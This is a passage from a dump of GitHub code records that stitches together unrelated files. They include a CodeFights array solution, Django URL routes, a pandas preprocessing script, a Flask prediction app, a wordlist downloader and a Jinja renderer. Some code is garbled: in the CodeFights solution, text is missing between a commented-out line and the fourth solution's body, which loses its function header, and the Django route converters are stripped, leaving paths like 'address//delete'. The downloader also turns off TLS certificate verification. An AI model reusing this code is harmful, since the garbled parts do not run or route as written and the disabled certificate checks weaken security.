Alternately, you can remove 2 to get the strictly increasing sequence\n# [1, 3].\n#\n# Input Format\n#\n# array.integer sequence\n# 2 ≤ sequence.length ≤ 10**5\n# -10**5 ≤ sequence[i] ≤ 10**5\n#\n# Output Format \n#\n# Return true if it is possible to remove one element from the array in order \n# to get a strictly increasing sequence, otherwise return false.\n#\n# Solution:\n# Solution 1 involves using numpy, but when attempting to use it in\n# codefights, it says that numpy module cannot be found.\n#\n# Solution 2 and 3 does not use numpy and passes 32 of 34 test cases, but times\n# out on test case 33. According to comments, this test case has 1000's of items\n# so creating a new list with each iteration is probably causing the timeout.\n#\n# Solution 4 simply goes through the list of integers one time making \n# comparisons to ensure that it is increasing, and increasing a failure \n# counter for cases where it does not. This passes all test cases.\n#\n# Solution 5 is not my solution, but was in the comments. It is close to my\n# solution 4, but less code and a bit more elegant.\n\"\"\"\n##############\n# SOLUTION 1 #\n##############\n#import numpy as np\n#\n#def monotonic(x):\n# dx = np.diff(x)\n# return np.all(dx >= 0)\n## return np.all(dx <= 0) or np.all(dx >= 0)\n#\n#def almostIncreasingSequence(sequence):\n# for i in range(len(sequence)):\n# tmp = list(sequence)\n# tmp.pop(i)\n# if monotonic(tmp) == True:\n# return True\n# return False\n# \n#print(almostIncreasingSequence([1,3,2,1])) \n#print(almostIncreasingSequence([1,3,2])) \n \n\n##############\n# SOLUTION 2 #\n##############\n#def strictly_increasing(L):\n# return all(x sequence[i-1]:\n prev = sequence[i+1]\n else:\n prev = sequence[i]\n if sequence[i+2] <= prev:\n numFail += 1\n else:\n prev = sequence[i]\n if numFail > 1:\n return False\n else:\n prev = sequence[i+1]\n\n return True\n\n##############\n# SOLUTION 5 #\n##############\n#def almostIncreasingSequence(sequence): \n# count_decreasing_sq = 0\n# for i in range(len(sequence) - 1):\n# if sequence[i+1] <= sequence[i]:\n# count_decreasing_sq += 1\n# if (i >= 1) and (sequence[i+1] <= sequence[i-1]):\n# if (len(sequence) - 2 > i) and (sequence[i+2] <= sequence[i]):\n# count_decreasing_sq += 1\n# if count_decreasing_sq > 1:\n# return False\n# \n# return True\n\n\n\n \nprint(almostIncreasingSequence([1,3,2,1])) # False\nprint(almostIncreasingSequence([1,3,2])) # True\nprint(almostIncreasingSequence([2,3,1,3])) # False\nprint(almostIncreasingSequence([1,3,1,2])) # False\nprint(almostIncreasingSequence([10,1,2,3,4,5])) # True\nprint(almostIncreasingSequence([1,2,3,4,5,6])) # True\nprint(almostIncreasingSequence([3,5,3,6])) # True\nprint(almostIncreasingSequence([1,2,5,3,4,5])) # True\nprint(almostIncreasingSequence([1,2,5,5,5])) # False","repo_name":"henrypj/codefights","sub_path":"Intro/02-EdgeOfTheOcean/almostIncreasingSequence.py","file_name":"almostIncreasingSequence.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16335521285","text":"from django.urls import path\nfrom . import views\nfrom rest_framework.authtoken.views import obtain_auth_token\n\napp_name=\"accounts\"\n\n\nurlpatterns = [\n path('address/create', views.api_add_address, name=\"Creat_Address\"),\n path('address//delete', views.api_delet_address, name=\"Delete_Address\"),\n path('address//edit', views.api_edit_address, name=\"edit_Address\"),\n path('address/', views.api_get_address, name=\"One_Address\"),\n path('address', views.GetAllAddress, name=\"All_Address\"),\n\n path('user/create', views.CreatUser, name=\"CreatUser\"),\n path('user/login', obtain_auth_token, name=\"login\"),\n path('user/info', views.GET_User, name=\"GET_User\"),\n path('user/update', views.Edit_User, name=\"Edit_User\"),\n]","repo_name":"seif-elden/e-commerce-API","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24780058055","text":"import os\nimport pathlib\nimport json\nimport warnings\n\nimport pandas as pd\nimport numpy as np\n\n# Load the data\npath = pathlib.Path(__file__).resolve().parent / \"0_raw data\"\ndf = pd.read_csv(\n os.path.join(path, \"raw_fundamental.csv\"),\n index_col=[0, 1],\n parse_dates=[\"Date\", \"Period_beginning\"],\n)\n# Select stocks and features based on results of data validation\nwith open(\"preprocessing_metadata/metadata_raw_data.json\") as f:\n metadata = json.loads(f.read())\n stocks_to_keep = set(metadata[\"Stocks\"])\n features_to_keep = set(metadata[\"Fundamental features\"])\n# Add some features needed for feature engineering later on\nfeatures_to_keep = features_to_keep.union(\n [\n \"commonStockSharesOutstanding\",\n \"totalCurrentAssets\",\n \"totalRevenue\",\n \"netIncomeApplicableToCommonShares\",\n \"totalCashFromOperatingActivities\",\n \"totalAssets\",\n \"totalLiab\",\n \"longTermDebt\",\n \"shortTermDebt\",\n \"totalStockholderEquity\",\n \"interestExpense\",\n ]\n)\ndf = df.copy().loc[:, features_to_keep]\n# Drop duplicate index\ndf = df[~df.index.duplicated(keep=\"first\")]\n# Drop stocks with too many missing values\ndf = df.copy().loc[stocks_to_keep]\n# Infs to Nans\nprint(\"Fundamental\")\nprint(df.isin([np.inf, -np.inf]).sum().sum(), \" Infs replaced to Nans\")\ndf = df.replace([np.inf, -np.inf], np.nan)\n# Forward filling\nprint(\"Before ffilling: \", df.isnull().sum().sum(), \" Nans\")\ndf = df.groupby(by=\"Stock\").ffill()\nprint(\"After ffilling: \", df.isnull().sum().sum(), \" Nans\")\n# Feature engineering\ndf.loc[:, \"ReturnOnEquity\"] = np.divide(\n df[\"netIncome\"].astype(\"float\"), df[\"totalStockholderEquity\"].astype(\"float\")\n)\ndf.loc[:, \"ebit\"] = (\n df[\"netIncome\"].astype(\"float\")\n + df[\"interestExpense\"].astype(\"float\")\n + df[\"incomeTaxExpense\"].astype(\"float\")\n)\ndf.loc[:, \"Debt\"] = df[\"shortTermDebt\"].astype(\"float\") + df[\"longTermDebt\"].astype(\n \"float\"\n)\n# One-hot-encode categorical columns. The way below might not be the most appropiate way but does the job for now\nif \"Period_beginning\" in df.columns:\n df.loc[:, \"Period_beginning\"] = pd.DatetimeIndex(df[\"Period_beginning\"]).month\n# Data validation of the engineered features\nif df.loc[:, \"ReturnOnEquity\"].isin([np.inf, -np.inf]).sum().sum() > 0:\n df.loc[:, \"ReturnOnEquity\"] = (\n df[\"ReturnOnEquity\"]\n .replace([np.inf, -np.inf], np.nan)\n .groupby(by=\"Stock\")\n .ffill()\n )\n warnings.warn(\n \"One of the fundamental features engineered had inf values: ReturnOnEquity. Infs replaced for nans and ffilled.\"\n )\n# Save names of the engineered features as not to drop them later on\nnew_columns = [\"ReturnOnEquity\", \"ebit\", \"Debt\"]\nwith open(\"preprocessing_metadata/engineered_features_fndmt.json\", \"w\") as f:\n json.dump({\"EngineeredFeatures\": new_columns}, f, indent=4)\n# Save the data\npath = pathlib.Path(__file__).resolve().parent / \"1_processed data\"\npath.mkdir(parents=True, exist_ok=True)\ndf.to_csv(os.path.join(path, \"1_preprocessed_fundamental.csv\"))\n","repo_name":"PbVrCt/time-series-pipeline","sub_path":"3_1_preprocessingFNDMT.py","file_name":"3_1_preprocessingFNDMT.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"39727390057","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: wxnacy@gmail.com\n\"\"\"\n\n\"\"\"\nimport pygments\n\nfrom pygments.lexers.python import PythonLexer\nfrom prompt_toolkit.formatted_text import PygmentsTokens\nfrom prompt_toolkit import print_formatted_text\n\nfrom csarg import CommandArgumentParser\nfrom csarg import CommandArgumentParserFactory\n\nfrom goss.loggers import get_logger\nfrom goss.cli.run_mode import RUN_MODE\n\nclass CommandArgumentParserFactory(CommandArgumentParserFactory):\n pass\n\nclass CmdArgumentParser(CommandArgumentParser):\n logger = get_logger('CmdArgumentParser')\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def get_completions_after_argument(self, word_for_completion):\n \"\"\"\n 获取补全的单词列表\n :param word_for_completion: 补全需要的单词\n \"\"\"\n return []\n\n def get_completions_after_cmd(self, argument, words=None):\n \"\"\"获取补全使用的单词列表\"\"\"\n res = []\n if words and isinstance(words, list):\n res.extend(words)\n args = self.get_arguments()\n for arg in args:\n if arg.is_cmd:\n continue\n # 已经赋值的不需要展示\n # 列表除外\n if arg.is_set and not arg.is_list:\n continue\n res.append(dict(text = '--' + arg.name, display_meta = arg.help))\n return res\n\n def parse_args(self, text):\n \"\"\"解析参数\"\"\"\n args = super().parse_args(text)\n arg_list = self.get_arguments()\n for arg in arg_list:\n log_text = f'{self.cmd} argument {arg.name}' \\\n f' {getattr(args, arg.name.replace(\"-\", \"_\"))}'\n self.logger.info(log_text)\n return args\n\n def _print(self, text):\n tokens = list(pygments.lex(text, lexer=PythonLexer()))\n print_formatted_text(PygmentsTokens(tokens), end='')\n\n def run(self, text):\n func_name = f'run_{RUN_MODE.mode}'\n try:\n func = getattr(self, func_name)\n except:\n return\n\n func(text)\n","repo_name":"wxnacy/goss","sub_path":"goss/argument/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7393210836","text":"\"\"\"\npydockerutils\n-------------------------------\n - Eugenio Marinetto\n - nenetto@gmail.com\n-------------------------------\n\"\"\"\n\nfrom setuptools import setup, find_packages\nfrom codecs import open\nfrom os import path\nimport sys\n\n\nhere = path.abspath(path.dirname(__file__))\n\n# PRE INSTALL COMMANDS COMES HERE\nsys.path.append(here)\n\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\n\nsetup(\n name='pydockerutils',\n version='1.0',\n description='Installers scripts for docker containers',\n long_description=long_description,\n url='https://github.com/nenetto/pydockerutils',\n author='Eugenio Marinetto',\n author_email='nenetto@gmail.com',\n packages=find_packages(exclude=(\"tests\",)),\n install_requires=['setuptools>=39.1.0',\n 'tabulate>=0.8.2'],\n include_package_data=True,\n package_data={'': ['forticlient/files/linux/forticlient.sh',\n 'forticlient/files/linux/forticlient_setup',\n 'forticlient/files/linux/connect_vpn.sh'\n ]\n },\n entry_points={'console_scripts': ['install_forticlient = pydockerutils.forticlient.forticlient_install:install',\n 'install_pyodbc = pydockerutils.mssql.mssql_install:install']}\n )\n","repo_name":"nenetto/pydockerutils-ferrovial","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12461176147","text":"from flask import Flask, request, jsonify, render_template\n\nimport joblib\nimport numpy\n\napp = Flask(__name__)\n\n\nfrom datetime import datetime\nfrom datetime import date\ndef calculate_age(start,end):\n start = datetime.strptime(start, \"%Y-%m-%d\").date()\n end = datetime.strptime(end, \"%Y-%m-%d\").date()\n return end.year - start.year - ((end.month, end.day) < (start.month, start.day))\n\ndef calculate_diff_date(start,end):\n print(\"start in calculate diff\",start)\n print(\"end in calculate diff\",end)\n start = datetime.strptime(start, \"%Y-%m-%d\").date()\n end = datetime.strptime(end, \"%Y-%m-%d\").date()\n return (end - start).days\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict():\n # Check if request has a JSON content\n if request.json:\n # Get the JSON as dictionnary\n req = request.get_json()\n # Check mandatory key\n if \"input\" in req.keys():\n # Load model\n classifier = joblib.load(\"lr.joblib\")\n scaler = joblib.load(\"sc_x.joblib\")\n # Predict\n print(\"befor numpy\",req[\"input\"])\n data= req[\"input\"]\n print(\"dattatata\",data[0])\n #df1['funding_day'] = (df1['first_funding_at'] - df1['founded_at'])/np.timedelta64(1,'D')\n #df1['funding_range_1_2'] = (df1['last_funding_at'] - df1['first_funding_at'])/np.timedelta64(1,'D')\n \n ####requests\n #in =>df4[[\"funding_total_usd\", \"funding_rounds\", \"founded_at\", \"first_funding_at\", \"last_funding_at\"]]\n #out =>df4[[\"funding_total_usd\", \"funding_rounds\", \"company_age\", \"funding_day\", \"funding_range_1_2\"]]\n for i in data:\n print(\"i\",i)\n #geting the values of inputs \n founded_at= str(i[2])\n first_funding_at=str(i[3])\n last_funding_at= str(i[4])\n i[2]=calculate_age(founded_at,str(date.today()))\n #print(f\"i[2] after =====>{i[2]}<======\")\n first_funding_at=i[3]\n i[3]=calculate_diff_date(founded_at,first_funding_at)\n i[4]=calculate_diff_date(first_funding_at,last_funding_at) \n \n \n X=scaler.transform(data)\n print(\"x\",X) \n prediction = classifier.predict(X)\n # Return the result as JSON but first we need to transform the\n # result so as to be serializable by jsonify()\n prediction = str(prediction).replace(\" \",\",\")\n #print(prediction)\n return jsonify({\"predict\": prediction}), 200\n return jsonify({\"msg\": \"Error: not a JSON or no input key in your request\"})\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')","repo_name":"huynam1012/Projets-Jedha","sub_path":"Bloc 6_Projet Start-up/AppStartup/myapp.py","file_name":"myapp.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15774231220","text":"from utils.HttpUtil import HttpUtil\nfrom utils.ColorUtil import ColorUtil\nfrom utils.FileUtil import FileUtil\nimport requests\nimport sys\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\n# 禁用安全请求警告\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nclass Update:\n def __init__(self,config):\n # 保存的目录\n self.save_dir = \"result\"\n self.config = config\n self.conf = config.config\n # head方法使用的头部,为了解决gzip编码导致的content-length与实际内容大小不符的问题。\n self.headHeader = {\n \"User-Agent\": HttpUtil.getRandUA(),\n \"Accept-Encoding\": \"identity\"\n }\n self.header = {\n \"User-Agent\": HttpUtil.getRandUA(),\n }\n\n def getFileSize(self,url,proxy=\"\"):\n if proxy == \"\":\n try:\n rep = requests.get(url,headers=self.headHeader,verify=False)\n except requests.exceptions.ConnectionError as e:\n print(ColorUtil.Error(url + \" Need Proxy\"))\n return False\n else:\n rep = requests.get(url, headers=self.headHeader,proxies=proxy,verify=False)\n return rep.headers.get(\"Content-Length\")\n\n\n def getProxy(self):\n if \"proxy\" in self.conf and self.conf[\"proxy\"][\"http\"] != \"\" and self.conf[\"proxy\"][\"https\"]!=\"\":\n return self.conf[\"proxy\"]\n else:\n print(ColorUtil.Warn(\"No Set Proxy!\"))\n return \"\"\n\n def download(self,url,proxy=\"\"):\n print(ColorUtil.Info(\"正在下载:%s\"%url))\n\n if proxy == \"\":\n content_len = self.getFileSize(url)\n if content_len == False:\n return False\n rep = requests.get(url,headers=self.header,verify=False,stream=True)\n else:\n content_len = self.getFileSize(url,proxy)\n if content_len == False:\n return False\n\n rep = requests.get(url,headers=self.header,proxies=proxy,verify=False,stream=True)\n # 进度条\n\n temp_size = 0 # 已经下载文件大小\n chunk_size = 128 # 每次下载数据大小\n total_size = int(content_len)\n result = \"\" # 存放最终数据。\n # 进度条\n\n result = self.processBar(rep,content_len)\n print()\n # 第一次去重\n temp = result.split(b\"\\n\")\n # print(ColorUtil.Info(\"第一次去重前:%d\"%len(temp)))\n temp = list(set(result.split(b\"\\n\")))\n # print(ColorUtil.Info(\"第一次去重后:%d\"%len(temp)))\n return temp\n\n def processBar(self,rep,content_len):\n temp_size = 0 # 已经下载文件大小\n chunk_size = 1024 # 每次下载数据大小\n total_size = int(content_len)\n result = b\"\" # 存放最终数据。\n # 进度条\n for chunk in rep.iter_content(chunk_size=chunk_size):\n if chunk:\n temp_size += len(chunk)\n try:\n result += chunk\n except UnicodeDecodeError as e:\n continue\n #############花哨的下载进度部分###############\n done = int(50 * temp_size / total_size)\n\n sys.stdout.write(\"\\r[\\033[1;34mINFO\\033[0m] \\033[1;32m[%s%s] %d%% %0.2fM\\033[0m\" % (\n '#' * done, ' ' * (50 - done), 100 * temp_size / total_size, temp_size / 1024 / 1024))\n sys.stdout.flush()\n return result\n def save(self,filename,content):\n\n if len(content) != 0:\n # 第二次去重\n print(ColorUtil.Info(\"去重前:%d\" % len(content)))\n result = list(set(content))\n print(ColorUtil.Info(\"去重后:%d\" % len(result)))\n # 保存文件\n path = FileUtil.getProjectPath() + FileUtil.getFileSep() + self.save_dir + FileUtil.getFileSep()\n absolute_path = path + filename + \".txt\"\n\n if FileUtil.isFileExist(absolute_path) == False:\n FileUtil.createDirFile(absolute_path)\n f = open(absolute_path,\"wb\")\n\n f.write(b\"\\n\".join(content))\n f.close()\n\n\n\n def update(self,type=\"\"):\n proxy = self.getProxy()\n blacklist = self.conf[\"blacklist\"]\n\n if type != \"\":\n if type in blacklist or type not in self.conf:\n print(ColorUtil.Error(\"No Type %s\"%type))\n return\n result = []\n if len(self.conf[type]) == 0:\n print(ColorUtil.Error(\"Config(%s) is Empty!\"%type))\n return\n print(ColorUtil.InfoBlue(\"=========Type:%s=========\" % type))\n for url in self.conf[type]:\n # 本地文件\n if not url.startswith(\"http://\") and not url.startswith(\"https://\"):\n if FileUtil.isFileExist(url):\n\n print(ColorUtil.Info(\"正在读取:%s\" % url))\n result += open(url, \"rb\").readlines()\n else:\n print(ColorUtil.Error(\"No Path %s\" % url))\n else: # 链接\n temp = self.download(url, proxy)\n if temp == False:\n continue\n result += temp\n self.save(type, result)\n else:\n\n for key in self.conf:\n result = []\n if len(self.conf[key]) == 0:\n print(ColorUtil.Error(\"Config(%s) is Empty!\"%key))\n continue\n # 如果key在黑名单里,则继续下次循环。\n if key in blacklist:\n continue\n print(ColorUtil.InfoBlue(\"=========Type:%s=========\" % key))\n # 依次更新\n for url in self.conf[key]:\n # 本地文件\n if not url.startswith(\"http://\") and not url.startswith(\"https://\"):\n if FileUtil.isFileExist(url):\n print(ColorUtil.Info(\"正在读取:%s\"%url))\n result += open(url,\"rb\").readlines()\n else:\n print(ColorUtil.Error(\"No Path %s\"%url))\n else: # 链接\n temp = self.download(url, proxy)\n if temp == False:\n continue\n result += temp\n\n self.save(key, result)","repo_name":"Vicl1fe/PeneD","sub_path":"lib/Update.py","file_name":"Update.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1694510286","text":"from hoag.scripts.main_plots_nls import run_scheme\nimport numpy as np\n\nfrom jean_zay.submitit.general_submissions import get_cpu_executor\n\n\nexecutor = get_cpu_executor('main_plots_nls_indep', timeout_hour=2, n_cpus=10, project='hoag')\nscheme_labels = ['shine-big-rank', 'fpn', 'original', 'shine-big-rank-refined', 'shine-big-rank-opa']\n# search_space = np.linspace(0.75, 0.85, 10)\nsearch_space = [0.8]\n\njobs = []\nwith executor.batch():\n for exponential_decrease_factor in search_space:\n for scheme_label in scheme_labels:\n job = executor.submit(\n run_scheme,\n scheme_label=scheme_label,\n exponential_decrease_factor=exponential_decrease_factor,\n )\n jobs.append(job)\n\njob_counter = 0\nfor exponential_decrease_factor in search_space:\n big_df_res = None\n for scheme_label in scheme_labels:\n job = jobs[job_counter]\n job_counter += 1\n df_res = job.result()\n if big_df_res is None:\n big_df_res = df_res\n else:\n big_df_res = big_df_res.append(df_res)\n big_df_res.to_csv(f'plots_nls_results_exp{exponential_decrease_factor}.csv')\n","repo_name":"zaccharieramzi/submission-scripts","sub_path":"jean_zay/submitit/hoag/main_plots_nls.py","file_name":"main_plots_nls.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"26792511566","text":"data_tuple = ('h', 6.13, 'C', 'e', 'T', True, 'k', 'e', 3, 'e', 1, 'g')\nletters, numbers = [], []\n\nfor i in data_tuple:\n if type(i) == str:\n letters.append(i)\n else:\n numbers.append(i)\nletters.append(numbers[1])\nletters.reverse()\nletters.remove(\"g\")\nletters.remove(\"C\")\nletters.insert(1, \"G\")\nletters.insert(7, \"c\")\nletters = tuple(letters)\nprint(letters)\n\ndel numbers[:2]\nnumbers.insert(1, 2)\nnumbers.sort()\nnumbers = [i ** 2 for i in numbers]\nnumbers = tuple(numbers)\nprint(numbers)\n","repo_name":"Ruslan321532/py4","sub_path":"Ruslan_29-1_hw4.py","file_name":"Ruslan_29-1_hw4.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5937920837","text":"#Write a function that takes a string of braces, and determines if the order of the braces is valid. It should return true if the string is valid, and false if it's invalid.\n\ndef validBraces(string):\n braces = []\n open = [\"{\",\"[\",\"(\"]\n close = [\"}\",\"]\",\")\"]\n for i in string:\n if i in open:\n braces.append(i)\n elif i in close:\n pos = close.index(i)\n if ((len(braces) > 0) and (open[pos] == braces[len(braces)-1])):\n braces.pop()\n if len(braces) == 0:\n return True\n else:\n return False","repo_name":"justin-xing/CodeWars","sub_path":"ValidBraces.py","file_name":"ValidBraces.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27309101962","text":"from jinja2 import Environment, FileSystemLoader\nimport os\nfrom babel.support import Translations, NullTranslations\nimport datetime\nimport json\n\ndef to_json_support_datetime(value, format=\"%Y-%m-%d\", format_datetime = \"%Y-%m-%d %H:%M:%S\"):\n def update_datetime(obj):\n if isinstance(obj, dict):\n for k, v in obj.items():\n obj[k] = update_datetime(v)\n elif isinstance(obj, list):\n for i, v in enumerate(obj):\n obj[i] = update_datetime(v)\n elif isinstance(obj, tuple):\n obj = tuple(update_datetime(v) for v in obj)\n elif isinstance(obj, datetime.date):\n return obj.strftime(format)\n elif isinstance(obj, datetime.datetime):\n return obj.strftime(format_datetime)\n return obj\n return json.dumps(update_datetime(value), ensure_ascii=False)\n\nclass Renderer:\n def __init__(self, template_name, search_paths, log, html_templates_i18n_dirs = [], locale = None):\n '''\n @template_name e.g. \"base.html\"\n @search_paths list type, start elements has high priority\n '''\n self.log = log\n self.env = None\n if html_templates_i18n_dirs:\n if not locale:\n locale = \"en\"\n translations_merge = Translations.load(html_templates_i18n_dirs[0], [locale])\n if type(translations_merge) != NullTranslations:\n for dir in html_templates_i18n_dirs[1:]:\n translations = Translations.load(dir, [locale])\n if type(translations) != NullTranslations:\n translations_merge.merge(translations)\n self.env = Environment(\n extensions=['jinja2.ext.i18n'],\n loader=FileSystemLoader(search_paths)\n )\n self.env.filters[\"tojson2\"] = to_json_support_datetime\n self.env.install_gettext_translations(translations_merge)\n if not self.env:\n self.env = Environment(\n loader=FileSystemLoader(search_paths)\n )\n self.template = template_name\n\n def render(self, **kw_args):\n try:\n template = self.env.get_template(self.template)\n html = template.render(**kw_args)\n except Exception as e:\n self.log.e(\"render with template {} fail\".format(self.template))\n raise e\n return html\n\n\n","repo_name":"teedoc/teedoc","sub_path":"teedoc/html_renderer.py","file_name":"html_renderer.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":153,"dataset":"github-code","pt":"53"} +{"seq_id":"9651667524","text":"\n\nclass Node:\n def __init__(self, value: str):\n self.value = value\n self.left = None\n self.right = None\n\n def add_value(self, value: str, children: list) -> bool:\n if self.left == None:\n node = Node(value)\n children.append(node)\n self.left = node\n return True\n\n elif self.right == None:\n node = Node(value)\n children.append(node)\n self.right = node\n return True\n\n else:\n return False\n \n\n def get_children(self) -> tuple:\n return self.left, self.right\n \n def set_children(self, children: tuple):\n self.left = children[0]\n self.right = children[1]\n \n \n def __str__(self):\n return f'value: {self.value}, left: {self.left.value if type(self.left) is Node else None}, right: {self.right.value if type(self.right) is Node else None}'\n\n\n\n\n\ndef construct_tree(data: str) -> Node:\n\n top_node = Node(data[0])\n \n children = [top_node]\n\n for char in data[1:]:\n full_children = []\n for child in children:\n if child.add_value(char, children):\n break\n else:\n full_children.append(child)\n\n for child in full_children:\n children.remove(child)\n\n return top_node\n\ndef tree_to_string(first_node: Node) -> str:\n\n chars = [first_node.value]\n nodes = [first_node.left, first_node.right]\n children = []\n\n while nodes != []:\n for node in nodes:\n if node != None:\n chars.append(node.value)\n children.append(node.left)\n children.append(node.right)\n\n nodes = children\n children = []\n\n return ''.join(chars)\n \n \ndef swap_nodes(node: Node) -> Node:\n \n\n if node == None:\n return None\n \n if node.left == None or node.right == None:\n node.left, node.right = node.right, node.left\n return node\n else:\n\n leftc = node.left.get_children() if node.left != None else (None, None)\n rightc = node.right.get_children() if node.right != None else (None, None)\n\n node.left.set_children(rightc)\n node.right.set_children(leftc)\n\n node.left, node.right = swap_nodes(node.right), swap_nodes(node.left)\n \n\n return node\n \n\n\n\n\n# tree = construct_tree('hello there jiggy')\n# tree = swap_nodes(tree)\n# tree = swap_nodes(tree)\n\n# print (tree_to_string(tree))\n\n","repo_name":"spawncreeper2006/NewJigsCode","sub_path":"encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38114285893","text":"\n# coding: utf-8\n\n# # My First Data Cube\n# \n# A small notebook showing how to initialise connection and access the Data Cube a display a small section of data\n\n# In[1]:\n\n#get_ipython().magic(u'pylab')\n#%pylab inline\n#import mpld3; mpld3.enable_notebook() \n\n\n# In[2]:\n\nfrom datetime import datetime, date, timedelta\nfrom gdf import GDF\nfrom pprint import pprint\nimport matplotlib.pyplot as plt\n\n\n# In[3]:\n\ndef plotImages(arrays):\n img = arrays\n num_t = img.shape[0]\n num_rowcol = math.ceil(math.sqrt(num_t))\n fig = plt.figure()\n fig.clf()\n plot_count = 1\n for i in range(img.shape[0]):\n data = img[i]\n ax = fig.add_subplot(num_rowcol,num_rowcol,plot_count)\n plt.setp(ax, xticks=[], yticks=[])\n #cax = ax.imshow(data, interpolation='nearest', aspect = 'equal')\n cax = ax.pcolormesh(data) #, interpolation='nearest', aspect = 'equal')\n #fig.colorbar(cax)\n plot_count += 1\n fig.tight_layout()\n plt.show()\n\n\n# In[4]:\n\ng = GDF()\n#g.debug = True\n\n\n# In[5]:\n\ndata_request_descriptor = {'storage_type': 'LS7ETM',\n 'variables': ('B30', 'B40'),\n 'dimensions': {'X': {'range': (140.0, 140.125)},\n 'Y': {'range': (-35.0, -35.0+0.125)},\n #'T': {'range': (0, 6325376000),\n # 'array_range': (0, 4)\n #'crs': 'SSE', # Seconds since epoch\n #'grouping_function': g.null_grouping\n # }\n }\n }\n\n\n# In[6]:\n\nd = g.get_data(data_request_descriptor)\npprint(d)\nprint(d['arrays']['B30'].shape)\n\n\n\n# In[7]:\nplotImages(d['arrays']['B30'])\n\n\n# In[ ]:\n\ntype(d['arrays']['B30'])\n\n\n\n\n# In[ ]:\n\n\n\n","repo_name":"woodcockr/agdc-v2-examples","sub_path":"MyFirstDataCube.py","file_name":"MyFirstDataCube.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22098959327","text":"import numpy as np\nimport matplotlib.pyplot as plt\n#\n\ndef normal_dist(points, mean, variance, scale): # x wektor warotsic , srednia, variancja\n \n indices = np.linspace(0, points, points)\n density = (1/(2*np.pi*variance**2) ) * np.exp(-0.5*((indices-mean)/variance)**2)\n m = max(density)\n for i in range(240):\n density[i] /= m\n density[i] *= scale\n \n return density\n\n\nf0 = normal_dist(240, 120, 30, 0.7)\nf1 = normal_dist(240, 100, 45, 0.2)\nf2 = normal_dist(240, 140, 60, 0.1)\n\n\n\n# pdf = normal_dist(240, 10, 0.5)\n \n# plt.plot([index for index in range(240)],f0 , color = 'red')\n# plt.plot([index for index in range(240)],f1 , color = 'green')\n# plt.plot([index for index in range(240)],f2 , color = 'blue')\n\n# plt.show()\n\n\n\n\n\n# plt.plot(bins, ,\n# linewidth=2, color='r')\n# plt.show()","repo_name":"ErnestSzczepaniak/game","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37276697905","text":"\nfrom django.http import JsonResponse\nfrom django.utils import timezone\nfrom datetime import timedelta\nimport requests\nfrom django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.contrib.auth import get_user_model\nfrom store.models import Order, AccountType, Platform, PaymentMethod, Coupon, Transaction, PaymentDetails\nfrom users.models import Currency\nfrom django.shortcuts import redirect\nfrom .serializers import TransactionSerializer, OrderSerializer, AccountTypeSerializer, PlatformSerializer, \\\n PaymentMethodSerializer, PaymentDetailsSerializer, OrdersListSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAuthenticated\nfrom django.contrib import messages\n\nfrom users.models import CustomUser\nfrom rest_framework import serializers\nfrom django.core.mail import send_mail\nfrom django.template.loader import render_to_string\nfrom rest_framework import generics\nfrom rest_framework import status\nfrom .models import Order\nfrom django.core.files.base import ContentFile\nimport base64\nfrom django.http import Http404\nfrom django.conf import settings \n\n\nUser = get_user_model()\nfrom rest_framework.generics import get_object_or_404\n\nclass TransactionList(APIView):\n permission_classes = [IsAuthenticated]\n \n def get(self, request):\n transactions = Transaction.objects.filter(user=request.user).order_by('-created_at')[:3]\n serializer = TransactionSerializer(transactions, many=True)\n return Response(serializer.data)\n\n\nclass CustomUserSerializer(serializers.ModelSerializer):\n class Meta:\n model = CustomUser\n fields = ['id', 'username', 'email', 'first_name', 'last_name'] \n\n\nclass UserDetails(APIView):\n permission_classes = [IsAuthenticated]\n \n def get(self, request): \n user = get_object_or_404(User, id=request.user.id)\n user_serializer = 